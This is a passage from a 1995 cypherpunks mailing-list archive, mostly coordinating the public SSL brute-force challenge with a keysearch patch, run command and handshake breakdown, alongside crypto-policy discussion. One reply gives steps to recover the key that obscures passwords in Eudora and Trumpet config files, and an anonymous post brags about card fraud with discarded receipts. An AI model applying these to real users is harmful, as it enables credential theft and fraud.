nxq3IK82ItCftC5l5/AlU324DpeSr4ZyXFTs0SrfpqGaX4EqDTqac40MWSjCpIGG
8+ROsVFx4sJJJwBeXgy0yIJU3hh67I/fT2DUhqJXtxB5yroHF8X2go51rVLFNmwd
lNI8v42bWvw=
=vokW
-----END PGP SIGNATURE-----
-- 
The Checkered Daemon			       	  cdaemon@goblin.punk.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 19 Aug 95 12:59:56 PDT
To: cypherpunks@toad.com
Subject: DAM_lyz
Message-ID: <199508191959.PAA08294@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Information Week of August 28 has a cover story on
   "Internet Theft." It sees security threats in "freeware
   public-key encryption algorithms and anonymous remailer
   programs." BlackNet is red-flagged. Laggard law is cited.

   "This is where all the crime will be in the 21st century,"
   says Joseph Seanor, a federal government intelligence
   veteran. "Law enforcement officials are trying to get a
   handle on it, but they really can't stop it." Seanor adds,
   "When it comes to technology, criminals always seem to be
   one step ahead of law enforcement."


   If you can't steal the damthing: DAM_lyz











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Sat, 19 Aug 95 13:07:45 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: Certificates/Anonymity/Policy/True Names
In-Reply-To: <9508191818.AA22531@sulphur.osf.org>
Message-ID: <Pine.3.89.9508191641.A620955565-0100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


But this is precisely the issue: what does the *certificate* get any of 
these people that a simple digital signature does not provide?

On Sat, 19 Aug 1995, Rich Salz wrote:

> I think there are many people who might be willing to use an
> "anon CA" should it exist:
> 	Whistleblowers, perhaps Deep Throat would have used email
> 	People writing letters to the editor who don't want to trust
> 		the editor to withhold their info
> 	People who desire anonymyity yet don't want to trust the gov't
> 		to certify their communications as authentic/forged
> 		(Unabomber, Om Shin-rkyo)
> 	Any number of writers who have used psuedonyms and now want to
> 		get paid in ecash; Mark Twain?
> 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html
and http://www.law.cornell.edu/jol/froomkin.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andre Bacard <abacard@well.com>
Date: Sat, 19 Aug 95 16:24:55 PDT
To: abacard@well.com
Subject: EFF, Mike Godwin, Cliff Stoll
Message-ID: <199508192318.QAA27920@well.com>
MIME-Version: 1.0
Content-Type: text/plain


 
                      *** PLEASE REDISTRIBUTE FREELY ***
Hello CyberFolks,
 
Wednesday, August 16th BayFF (Bay Area Chapter of EFF) held a meeting in
San Francisco with speakers Mike Godwin and Cliff Stoll. Attached are a
few notes for those of you who missed the opportunity to attend.
 
See you in the future,
Andre Bacard
======================================================================
abacard@well.com                    Bacard wrote "The Computer Privacy
Stanford, California                Handbook" [Intro by Mitchell Kapor].
http://www.well.com/user/abacard    Published by Peachpit Press, (800)
Enjoy your privacy...               283-9444, ISBN # 1-56609-171-3.
=======================================================================
 
                  Notes from the BayFF Semi-Underground
                              Authorized by
                     Andre Bacard <abacard@well.com>
 
Wednesday, August 16, 1995, I found myself cruising through Golden Gate
Park. Suddenly I swerved into the right lane and shouted "Eureka." For
those who don't know, Eureka is the California state motto which, in the
tradition of the Gold Rush, means "I found it!" In San Francisco IT means
a parking place. Feeling euphoric about my good fortune, I started the
short walk long on memories towards the Haight-Ashbury district. It was
delightful and fogless. The salty air was cool. The smell of grass (the
type that city gardener's mow) was fresh. Passing a guitarist, I thought
of the Grateful Dead's Jerry Garcia, recently deceased. My mind flashed
back twenty-five years ago when I first visited Haight-Ashbury. Twenty-
five years ago at the dawn of the Computer Age... So many silicon chips
under the bridge... I thought of all the people in the Haight mourning
Garcia and donating to the Haight-Ashbury Free Clinic in Garcia's memory.
I flashed back upon my first meeting with John Perry Barlow, lyricist for
the Grateful Dead and co-founder of EFF. That meeting helped inspire me
to write COMPUTER PRIVACY HANDBOOK. Such were a few of the images that
danced through my mind as I entered the Cole & Page Street Public
Library... It was appropriate to be attending an EFF meeting.
 
John Gilmore, EFF Board Member, was the first person I saw. Gilmore
reminds me of a lean Chesire cat. He has a mischievous smile as if to
say, "You won't believe what just happened." Maybe we'll never discover
what just happened with John, since he's so much into crypto. In any
case, Gilmore introduced Mike Godwin as "The first lawyer in Cyberspace
and EFF's first employee."
 
Mike Godwin ("a cool guy who survived law school with his personality
intact" according to an anonymous EFF publicist) spoke for 90 minutes
about how to deal with reporters and, more specifically, about his role
in trying to correct the damage done to cyberspace by TIME's infamous
"CyberPorn" cover story. Godwin detailed many flaws in Carnegie Mellon
University undergraduate Mr. Rimm's study of cyberporn that led to the
"CyberPorn" piece. Godwin said of Rimm's paper: "It's as if you surveyed
the bookstores in Times Square in Manhattan and generalized to all
bookstores in America."
 
Cliff Stoll ("a wild and crazy guy with interesting hair" according to
the same anonymous EFF publicist) is the author of the best-selling book
SILICON SNAKE OIL. Stoll personifies the eccentric heritage of the San
Francisco counter-culture. With lots of humor and drama, Stoll presented
a critical view of the Internet. "The Internet is a perfect diversion
from learning" and "The Internet opens many doors that lead to empty
rooms" were two of his many memorable lines. Stoll noted that wisdom and
experience play little role in the Computer Cult (i.e., all the Hype
surrounding the Information Superhighway).
 
The EFF events that I've attended at WIRED's office in the San Francisco
Mission District and last night are well worth the hassle of hunting down
a parking place.
 
To learn more about future monthly BayFF meetings, send this e-mail:
 
      To: listserv@eff.org
      Subject: [ignore]
      subscribe BayFF
 
See you at future events,
Andre Bacard
 
P.S. I'm the guy with the fedora hat who people mistake for Indiana
Jones.
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iagoldbe@calum.csclub.uwaterloo.ca>
Date: Sat, 19 Aug 95 13:42:32 PDT
To: cypherpunks@toad.com
Subject: Re: SSL Challenge #2
Message-ID: <199508192042.QAA29044@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


Is there a standard way we're supposed to get together to divvy up the
keyspace?  Not knowing of any, I'll just announce that I'm working
on those keys that start with "a", from 0xafffffffff down to 0xa000000000.

I seem to be getting about 200000 to 400000 keys/sec, so it should take
about another 2 days (assuming the machines stay up that long...).

If anyone wants to join in, feel free.  Get original source from
http://pauillac.inria.fr/~doligez/ssl/slave.c (Damien's code),
and patch it with the diff at the bottom.  Note: I don't think there's
any crypto in the diff, and the rest of the sources are in France, so this
should be OK with the spooks. But you never know...

Compile the patched source on anything you can get, and run

./slave -t -d csclub.uwaterloo.ca 9114

The IP is 129.97.134.11 if you need it.  You can add -v or -V for more
verbosity, and -n num if you have num processors.

   - Ian "REALLY hoping I didn't screw up the code..."

--- dist/slave.c	Thu Aug 17 15:19:52 1995
+++ slave.c	Sat Aug 19 13:54:25 1995
@@ -297,18 +297,18 @@
   register int i;
 
   /* set up the block of data */
-#define x0 0xb894890e
-#define x1 0x2eb90ebf
-  x2 = 0x00074450 + ((~stpoint << 4) & 0xff000000);
-#define x4 0xa784af30
-#define x5 0x6913f879
-#define x6 0x539b2520
-#define x7 0x75ae60a0
-#define x8 0x90ebbf51
-#define x9 0xe10c2cf8
-#define x10 0x11ac18ea
-#define x11 0x2114834c
-#define x12 0x000080b6
+#define x0 0x9109c0fb
+#define x1 0x15a61060
+  x2 = 0x00368f3f + ((~stpoint << 4) & 0xff000000);
+#define x4 0x7bea0730
+#define x5 0x61eb659d
+#define x6 0x7441bbfa
+#define x7 0x5f3a45e8
+#define x8 0x38e6d5c6
+#define x9 0xa1a88cd6
+#define x10 0xf82ecaae
+#define x11 0x0296e2c8
+#define x12 0x000080a4
 #define x13 0x00000000
 #define x14 0x00000188
 #define x15 0x00000000
@@ -506,7 +506,7 @@
   int w;
   
   strcpy (progname, "worker");
-  nice (40);
+  nice (5);
   while (1){
     sock = open_socket ();
     if (sock == -1){
@@ -547,7 +547,11 @@
 
   Verb1 ("SIGCHLD received\n");
   while (1){
+#if 0
     pid = wait3 ((void *) &chldstat, WNOHANG, NULL);
+#else
+    pid = waitpid ((pid_t)-1, (void *) &chldstat, WNOHANG);
+#endif
     if (pid <= 0) break;
     Verb2 ("got child: %ld\n", pid);
     for (i = 0; i < nproc; i++){
@@ -610,6 +614,7 @@
     }
   }
   if (!ignore_ttys){    /* then look at ttys */
+#if 0
     d = opendir ("/dev");
     if (d == NULL) fatal ("opendir");
     while (1){
@@ -629,6 +634,7 @@
       }
     }
     if (errno) fatal ("readdir");
+#endif
   }
 }
 
@@ -901,7 +907,7 @@
   if (entry == NULL) fatal ("gethostbyname");
   memcpy (&serverhost, entry, sizeof (serverhost));
 
-  sanity_check ();
+  /* sanity_check (); */
   speed_test ();
   init_devices ();
   supervisor ();



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 19 Aug 95 13:43:44 PDT
To: cypherpunks@toad.com
Subject: Spooks and Hackers Inc
Message-ID: <199508192043.QAA11639@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Eye-catching quote in the Info Week story on Internet theft:


   Another threat is the growing number of information brokers
   who use online communications to match buyers and sellers.
   An increasing number of these brokers -- many of whom are
   former government intelligence employees in the United
   States and Eastern Europe -- work closely with hackers
   dealing in illicit data.

   "The biggest security problem organizations face today is
   information brokers," says Dan White, national director of
   information security at Ernst & Young in Chicago. "Since
   the end of the Cold War there have been a lot of people
   trained in espionage who don't have a lot to do."













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Sat, 19 Aug 95 14:04:00 PDT
To: cypherpunks@toad.com
Subject: Liability for Key Cracking via Java scripts?
In-Reply-To: <ac5b5ee423021004e6b5@[205.199.118.202]>
Message-ID: <RAA17871.199508192103@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May's post got me thinking...

Assume that Java became "trusted" by most people on the Internet.
(Java is a safe subset of the Oak language, it can be intrpereted,
or compiled.  One of the proposed uses is to embed it in Web
browsers.  The compiled form is roughly as fast as C++ code.)

Assume that there is some sort of secure low transaction cost fund 
tranfer system is available.


I beleve that's all the technology you need for selling idle CPU
cycles.  Would it take off?  Raytracing (and other types of rendering)
and key cracking are the only two uses I can think of off the top
of my head (you need a relitavly low amount of communication between
processes, the ability to survive some results never coming back
(and coming back out-of-order), and preferabbly the script and data
it works on need to be smallish)


Then I thought some more...  if Java really does get embeded in web
browsers (Netscape announced that they were going to do it... it is
somewhere on their press release page), what's to prevent the Java
anamited icon widget things from doing more then just animating the
dancing stick figure?  What if it cracks keys while dancing?  I think
Java "applets" are allowed to make some form of IP connections, if
they are what's the liability for _inadvertant_ key cracking?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Markku-Juhani Saarinen <marks@evitech.fi>
Date: Sat, 19 Aug 95 07:08:03 PDT
To: "Sean A. Walberg" <sean@escape.ca>
Subject: Re: Eudora/Trumpet encryption (stupid, solved here)
In-Reply-To: <Pine.SOL.3.91.950816110927.4127G-100000@wpg-01.escape.ca>
Message-ID: <Pine.3.89.9508191650.A25524-0100000@evitech.evitech.fi>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 16 Aug 1995, Sean A. Walberg wrote:

> I'm a crypto newbie here, but does anybody know how Trumpet Winsock 
> and/or Eudora encrypt the passwords in their .ini files?  I am trying to 
> write a front end for a client and would rather it set up automatically 
> rather than the program ask.
> 

It's not xor. It's wrap-around addition. Not much better than rot-13 :) I 
broke it for my friend just a couple of days back, but it seems like he 
has deleted the source I wrote at his place (crytoanalysis and writing the 
4-line c-source took about 20 minutes, total). Besides the key (the one 
used in encryption of the password) may be different in different 
versions and licences of these programs.

Here's what you'll have to do to get the built-in key:

1. set password to 00000000, for example, and see what it encrypts into.
2. now substract 0x30 (ascii 0) from every character of the encrypted 
   password. congratulations, you have the key! :)

Now you can pretty much figure out how to decrypt any password.

Note:
Encrypted characters are in the range 32..127. First perform a logical
and with 0x7f. If the result is smaller than 32, add 32.

- mark




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard.Johnson@Colorado.EDU (Richard Johnson)
Date: Sat, 19 Aug 95 16:19:59 PDT
To: cypherpunks@toad.com
Subject: Re: Certificates/Anonymity/Policy/True Names
Message-ID: <v02130505ac5c202162f8@[199.117.100.12]>
MIME-Version: 1.0
Content-Type: text/plain


The certificate gets their messages into systems that demand a
certification, whether for transport or display.

>But this is precisely the issue: what does the *certificate* get any of
>these people that a simple digital signature does not provide?
>
>On Sat, 19 Aug 1995, Rich Salz wrote:
>
>> I think there are many people who might be willing to use an
>> "anon CA" should it exist:
>>       Whistleblowers, perhaps Deep Throat would have used email
>>       People writing letters to the editor who don't want to trust
>>               the editor to withhold their info
>>       People who desire anonymyity yet don't want to trust the gov't
>>               to certify their communications as authentic/forged
>>               (Unabomber, Om Shin-rkyo)
>>       Any number of writers who have used psuedonyms and now want to
>>               get paid in ecash; Mark Twain?
>>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Flame Remailer <remailer@flame.alias.net>
Date: Sat, 19 Aug 95 09:36:29 PDT
To: cypherpunks@toad.com
Subject: Costs of Credit Card Fraud and Brute-Force Codebreaking
Message-ID: <199508191631.SAA10338@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


fc@all.net wrote:
>I think a lot of people miss the distinction between automated message
>cracking and dumpster diving.  Dumpster diving is not free.  It costs at
>least a dollar each to get credit card slips by dumpster diving.
>
>Consider that in order to use the information, you have to get the slip,
>pull off the numbers, enter them into a computer (or even worse yet,
>create a phoney card or make a phone call) in order to use the
>information.  The break-even point for an automated cracking and usage
>system is more than a dollar per stolen card.  My parallel processor
>is actually more cost effective for crimilar theft via credit card fraud.

Well, a few years ago I partially satisfied my phone-phreaking habit in
the following manner:
I would walk up to a busy intersection in a comercial area and stroll
through the various gas stations located there, collecting receipts
that careless customers had forgotten to take with them after using the
"pay-at-the-pump".  Then I would visit the pay phones at the nearby
mini-malls.  It sure didn't cost me a dollar a number.

The cost/value of a card number depends a lot on what you seek to gain.
If it's free phone calls, your costs are basically nil.  If you want
free gas, it'll cost you $500 or so for the card reader/writer and a
few old cards.  If you have a system for extracting thousands of dollars
from each card, economics of scale would probably justify the $10000
rc4-breaker.  ...or you could just hack netcom, steal the mother lode
and be set for life...  (Hi Kevin!  drop me a line when you get out;
ya gotta love those plea-bargains - 30 year sentence reduced to 8
months! ;-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Mon, 21 Aug 95 08:37:06 PDT
To: cypherpunks@toad.com
Subject: NEXT CHALLENGE: please check my config file
Message-ID: <18468.9508191922@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



As you may have surmised Hal has given us another challenge to satisfy
the people who want to do a challenge to see *how fast* they can do it
by involving as many people and their computers as possible.

Here's my take on interpreting Hal's data to come up with a
configuration file.

I think the challenge file should look like this:

-------------------------------------8<-------------------------------------
# SSLbrute 1.0 parameter file for Hal Finney's 2nd SSL challenge as 
# posted to Cypherpunks on 19 August 1995. 
#
# file checksum (ignoring # comments and whitespace) is 2977

CLEAR-MASTER     fbc009916010a6153f8f36
CHALLENGE        07ea7b9d65eb61fabb4174e8453a5fc6
CONNECTION-ID    d5e638d68ca8a1aeca2ef8c8e29602a4
SERVER-VERIFY    006599b6d2f2a736
-------------------------------------8<-------------------------------------

Below I will give my resoning for each field.  Each field as it is
derived will be quoted with >>>

Could a few people check that I have made no mistakes.

Please check, thanks.

Adam


>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

A break down of Hal's challenge, could someone please check my logic
in deriving an Andrew Roo's style config file for brutessl 1.0 and
check my interpretation against Hal's interpretation in the previous
challenge.

----------------------------------------------------------------------

First message from client

0x80 0x1c 0x01 0x00 0x02 0x00 0x03 0x00 0x00 0x00 0x10 0x02 0x00 0x80 0x07 0xea
0x7b 0x9d 0x65 0xeb 0x61 0xfa 0xbb 0x41 0x74 0xe8 0x45 0x3a 0x5f 0xc6 


0x80 0x1c       Length field: 28 bytes follow in the packet.
0x01            MSG_CLIENT_HELLO
0x00 0x02       CLIENT-VERSION-MSB CLIENT-VERSION-LSB
0x00 0x03       CIPHER-SPECS-LENGTH-MSB CIPHER-SPECS-LENGTH-LSB
0x00 0x00       SESSION-ID-LENGTH-MSB SESSION-ID-LENGTH-LSB
0x00 0x10       CHALLENGE-LENGTH-MSB CHALLENGE-LENGTH-LSB
0x02 0x00 0x80  CIPHER-SPECS-DATA
                SESSION-ID-DATA
0x07 .. 0xc6	CHALLENGE-DATA [16 bytes]

CHALLENGE is:


>>> CHALLENGE        07ea7b9d65eb61fabb4174e8453a5fc6


first message from server

0x82 0x14 0x04 0x00 0x01 0x00 0x02 0x01 0xf6 0x00 0x03 0x00 0x10 0x30 0x82 0x01
0xf2 0x30 0x82 0x01 0x5b 0x02 0x02 0x01 0x8a 0x30 0x0d 0x06 0x09 0x2a 0x86 0x48
0x86 0xf7 0x0d 0x01 0x01 0x04 0x05 0x00 0x30 0x47 0x31 0x0b 0x30 0x09 0x06 0x03
0x55 0x04 0x06 0x13 0x02 0x55 0x53 0x31 0x10 0x30 0x0e 0x06 0x03 0x55 0x04 0x0b
0x13 0x07 0x54 0x65 0x73 0x74 0x20 0x43 0x41 0x31 0x26 0x30 0x24 0x06 0x03 0x55
0x04 0x0a 0x13 0x1d 0x4e 0x65 0x74 0x73 0x63 0x61 0x70 0x65 0x20 0x43 0x6f 0x6d
0x6d 0x75 0x6e 0x69 0x63 0x61 0x74 0x69 0x6f 0x6e 0x73 0x20 0x43 0x6f 0x72 0x70
0x2e 0x30 0x1e 0x17 0x0d 0x39 0x35 0x30 0x37 0x31 0x31 0x32 0x32 0x34 0x31 0x34
0x35 0x5a 0x17 0x0d 0x39 0x37 0x30 0x37 0x31 0x30 0x32 0x32 0x34 0x31 0x34 0x35
0x5a 0x30 0x7f 0x31 0x0b 0x30 0x09 0x06 0x03 0x55 0x04 0x06 0x13 0x02 0x55 0x53
0x31 0x0b 0x30 0x09 0x06 0x03 0x55 0x04 0x08 0x13 0x02 0x43 0x41 0x31 0x16 0x30
0x14 0x06 0x03 0x55 0x04 0x07 0x13 0x0d 0x4d 0x6f 0x75 0x6e 0x74 0x61 0x69 0x6e
0x20 0x56 0x69 0x65 0x77 0x31 0x26 0x30 0x24 0x06 0x03 0x55 0x04 0x0a 0x13 0x1d
0x4e 0x65 0x74 0x73 0x63 0x61 0x70 0x65 0x20 0x43 0x6f 0x6d 0x6d 0x75 0x6e 0x69
0x63 0x61 0x74 0x69 0x6f 0x6e 0x73 0x20 0x43 0x6f 0x72 0x70 0x2e 0x31 0x23 0x30
0x21 0x06 0x03 0x55 0x04 0x03 0x13 0x1a 0x45 0x2d 0x53 0x74 0x6f 0x72 0x65 0x20
0x54 0x72 0x61 0x6e 0x73 0x61 0x63 0x74 0x69 0x6f 0x6e 0x20 0x53 0x65 0x72 0x76
0x65 0x72 0x30 0x5c 0x30 0x0d 0x06 0x09 0x2a 0x86 0x48 0x86 0xf7 0x0d 0x01 0x01
0x01 0x05 0x00 0x03 0x4b 0x00 0x30 0x48 0x02 0x41 0x00 0xc7 0x24 0x0d 0xbd 0xfe
0x5f 0x21 0x09 0xb4 0x46 0x12 0xbb 0xc7 0x4c 0xbc 0x0c 0x98 0xe3 0x11 0x19 0x60
0x85 0x86 0x0a 0xa2 0xaf 0xae 0x8f 0xf9 0x43 0x86 0x92 0x1f 0xcc 0xd3 0x38 0xcf
0x92 0x14 0xa7 0x8c 0x89 0x07 0x26 0xd4 0x21 0x55 0xa8 0x43 0x2d 0xb4 0xec 0xce
0x24 0x73 0x5e 0x7c 0xe2 0xbe 0x22 0x2d 0xbd 0x96 0xbf 0x02 0x03 0x01 0x00 0x01
0x30 0x0d 0x06 0x09 0x2a 0x86 0x48 0x86 0xf7 0x0d 0x01 0x01 0x04 0x05 0x00 0x03
0x81 0x81 0x00 0x8f 0xbe 0x0c 0xae 0xc8 0xf0 0x22 0xef 0xae 0x83 0xb5 0xb1 0xe3
0xb4 0xd9 0xd6 0xa9 0x4a 0xb6 0x60 0x9c 0x0b 0x00 0x70 0x12 0x88 0x73 0xd1 0xef
0xe2 0x54 0xf6 0x3a 0xc7 0xa5 0xbe 0xe1 0xe0 0xdb 0x4d 0x20 0x10 0x3d 0x68 0x7c
0x8d 0xdb 0x16 0xf6 0x67 0xe7 0x1d 0x51 0xbc 0x19 0xa2 0xf6 0xbf 0x6f 0xa4 0x52
0xc7 0x7e 0x50 0x3d 0xb9 0x3e 0x1e 0x67 0xff 0xf6 0xf2 0x5d 0xe7 0x2b 0x7e 0x3a
0x7e 0x6c 0x40 0xb7 0x04 0x9c 0x2c 0x2b 0x89 0x0f 0x8c 0xb5 0x93 0xd8 0xac 0x94
0xe6 0x5f 0x84 0xe8 0x71 0x75 0x9e 0x10 0x6e 0x36 0xe6 0x14 0xfe 0xba 0xf8 0x11
0x71 0x9d 0x74 0x33 0x48 0x74 0xc1 0xba 0xcb 0xff 0x58 0x86 0x8c 0xba 0x9c 0x08
0xad 0xce 0x8a 0x02 0x00 0x80 0xd5 0xe6 0x38 0xd6 0x8c 0xa8 0xa1 0xae 0xca 0x2e
0xf8 0xc8 0xe2 0x96 0x02 0xa4 

This is interpreted as follows:

0x82 0x14       Packet length, 532 bytes follow.
0x04            MSG-SERVER-HELLO
0x00            SESSION-ID-HIT
0x01            CERTIFICATE-TYPE
0x00 0x02       SERVER-VERSION-MSB SERVER-VERSION-LSB
0x01 0xf6       CERTIFICATE-LENGTH-MSB CERTIFICATE-LENGTH-LSB
0x00 0x03       CIPHER-SPECS-LENGTH-MSB CIPHER-SPECS-LENGTH-LSB
0x00 0x10       CONNECTION-ID-LENGTH-MSB CONNECTION-ID-LENGTH-LSB
0x30...0x8a     CERTIFICATE-DATA [502 bytes]
0x02 0x00 0x80  CIPHER-SPECS-DATA
0xd5...0xa4     CONNECTION-ID-DATA [16 bytes]

CONNECTION-ID is:

>>> CONNECTION-ID    d5e638d68ca8a1aeca2ef8c8e29602a4

Second message from client

0x80 0x55 0x02 0x02 0x00 0x80 0x00 0x0b 0x00 0x40 0x00 0x00 0xfb 0xc0 0x09 0x91
0x60 0x10 0xa6 0x15 0x3f 0x8f 0x36 0x5a 0x19 0x06 0x8e 0x58 0xc4 0xfa 0xd0 0x73
0xd4 0x6d 0x20 0x97 0x2f 0x85 0x95 0xb3 0xa5 0x97 0xb5 0xe0 0x63 0x91 0x61 0xb7
0x76 0x3c 0x4e 0x62 0x8b 0x02 0x2b 0x05 0x98 0xd4 0x14 0x44 0x63 0xf3 0x43 0x7e
0xa0 0xa8 0x3f 0x16 0xb2 0x43 0x4b 0x24 0x76 0xae 0xba 0x8c 0x89 0x71 0xde 0x25
0x6b 0xce 0x89 0x77 0x8a 0x30 0x2a 

This is interpreted as follows:

0x80 0x55       Packet length, 85 bytes follow.
0x02            MSG-CLIENT-MASTER-KEY
0x02 0x00 0x80  CIPHER-KIND
0x00 0x0b       CLEAR-KEY-LENGTH-MSB CLEAR-KEY-LENGTH-LSB
0x00 0x40       ENCRYPTED-KEY-LENGTH-MSB ENCRYPTED-KEY-LENGTH-LSB
0x00 0x00       KEY-ARG-LENGTH-MSB KEY-ARG-LENGTH-LSB
0xfb...0x36     CLEAR-KEY-DATA [11 bytes]
0x5a...0x2a     ENCRYPTED-KEY-DATA [64 bytes]
                KEY-ARG-DATA

So CLEAR-MASTER is:

>>> CLEAR-MASTER     fbc009916010a6153f8f36


Second message from server

0x80 0x21 0x9a 0xc5 0xf7 0xd1 0x6a 0x5b 0x26 0x43 0x57 0x67 0x65 0xb6 0x3f 0x9a
0xe3 0x82 0x00 0x65 0x99 0xb6 0xd2 0xf2 0xa7 0x36 0xa0 0x7d 0xd9 0x94 0xcf 0xe2
0x33 0xb2 0x1b 

This is interpreted as follows:

0x80 0x21       Packet length, 33 bytes follow
0x9a...0x82     RC4 encrypted MAC [16 bytes]
0x00            RC4 encrypted MSG-SERVER-VERIFY (0x05)
0x65...0x1b     RC4 encrypted CHALLENGE-DATA from CLIENT-HELLO message
                [16 bytes]


Plaintext (MSG-SERVER-VERIFY plus CHALLENGE-DATA):

0x05 0x07 0xea 0x7b 0x9d 0x65 0xeb 0x61 0xfa 0xbb 0x41 0x74 0xe8 0x45 0x3a 0x5f
0xc6 

Ciphertext (from SERVER-VERIFY packet):

0x00 0x65 0x99 0xb6 0xd2 0xf2 0xa7 0x36 0xa0 0x7d 0xd9 0x94 0xcf 0xe2 0x33 0xb2
0x1b

SERVER-VERIFY is the encrypted MSG-SERVER-VERIFY plus the first seven
bytes of the encrypted CHALLENGE-DATA:

>>> SERVER-VERIFY      006599b6d2f2a736



So the completed challenge file is:

-------------------------------------8<-------------------------------------
# SSLbrute 1.0 parameter file for Hal Finney's 2nd SSL challenge as 
# posted to Cypherpunks on 19 August 1995. 
#
# file checksum (ignoring # comments and whitespace) is 2977

CLEAR-MASTER     fbc009916010a6153f8f36
CHALLENGE        07ea7b9d65eb61fabb4174e8453a5fc6
CONNECTION-ID    d5e638d68ca8a1aeca2ef8c8e29602a4
SERVER-VERIFY    006599b6d2f2a736
-------------------------------------8<-------------------------------------

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Mon, 21 Aug 95 08:37:01 PDT
To: cypherpunks@toad.com
Subject: NEXT CHALLENGE: volunteers to compile brutessl for a few platforms
Message-ID: <18518.9508191936@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Could someone with a few things handy compile Andrew Roos code so that
we have a nice handy pre-compiled DOS binary.

A must will be a DOS binary, what other platforms?

	- DOS (Need Microsoft visual C++ I think this is what Andrew used,
		there is an assembler speed up file)

	- OS/2?

	- PowerPC + MAC?

Any other architecture you would like to see a binary made available
for.

Please send binary to Piete (cc line) or me, and it would be nice if
you could provide a detatched PGP signature also.

The tar file is at:

	http://dcs.ex.ac.uk/~aba/brutessl.tar.gz

There is a pointer to brutessl.tar.gz.  You'll need to use save next
link ( "shift and click" on URL in netscape 1.1 ), or whatever
mechanism your browser provides.

You'll also need TAR.EXE and GZIP.EXE for DOS to unpack a .tar.gz file.

In case this is a problem I have just created this:

	http://dcs.ex.ac.uk/~aba/brutessl/

containing these files:

   2 -rw-r--r--    1 aba      phd          439 Jul 31 11:14 Makefile
   2 -rw-r--r--    1 aba      phd          602 Jul 31 17:19 README
  34 -rw-r--r--    1 aba      phd        16450 Jul 31 17:20 assembly.c
  42 -rw-r--r--    1 aba      phd        21373 Jul 31 17:21 brutessl.c
   6 -rw-r--r--    1 aba      phd         2776 Jul 31 17:21 brutessl.h
  26 -rw-r--r--    1 aba      phd        12709 Jul 31 17:21 brutessl.txt
   2 -rw-r--r--    1 aba      phd          351 Aug 19 20:31 chal2.pf
   2 -rw-r--r--    1 aba      phd          264 Jul 31 17:21 chal1.pf
  34 -rw-r--r--    1 aba      phd        16500 Jul 31 17:22 search.c
   2 -rw-r--r--    1 aba      phd          296 Jul 31 17:22 test.pf

You should be able to access them individually as:

	http://dcs.ex.ac.uk/~aba/brutessl/Makefile

etc.

(just in case you can't handle TAR / GZIP files on your DOS machine).

chal1.pf is the challenge that Damien just broke, chal2.pf is my first
attempt at producing a challenge file for Hal's next challenge.

The challenge info will be at:

	http://www.brute.cl.cam.ac.uk/brute/

when it starts.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Sat, 19 Aug 95 18:11:31 PDT
To: cypherpunks@toad.com
Subject: Spooks and Hackers, etc.
Message-ID: <Pine.SOL.3.91.950819210419.18364G-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Subject: Internet Police

According to an AP story, Wisconsin Attorney General James Doyle says that
police must monitor the Internet to stop child porn, drug trafficking, and
fraud.

"We need to see that police are surfing the Internet just as other people
are," Doyle said. "This is a good example of where the law is slower than
technology."

Doyle made his comments in a speech to the Wisconsin Chiefs of Police
Association Conference.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Mon, 21 Aug 95 08:37:01 PDT
To: cypherpunks@toad.com
Subject: NEXT CHALLENGE: plan of action
Message-ID: <18599.9508192006@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Okay this a bit awkward because Piete doesn't appear to be in today,
but there are a few things which need doing first (compiling which I
mentioned in the previous message, and a 2nd opinion on the config
file which I posted in the previous message to that), so perhaps this
is not a problem.

What we want to do (what I want to do!) with this latest challenge of
Hal's is to try to see how fast it can be brute forced.  To this end
we need a kind of starting line effect, so everyone gets their
software, and has it tested as running correctly.  People using the
socket doler have their clients ticking over, people using the WWW
browser have their fingers poised over the button etc, and then Piete
(when he gets back, let's say Monday 12:00 GMT to be safe, he can
ammend that time later if necessary when he next gets on line) will
start the race.

Sound like a good plan?

Where to find things...

The brutessl software, the unix socket client, and the Windows NT
client are on:

	http://www.brute.cl.cam.ac.uk/brute/

Also I have (temporarily, until Piete has a chance to update
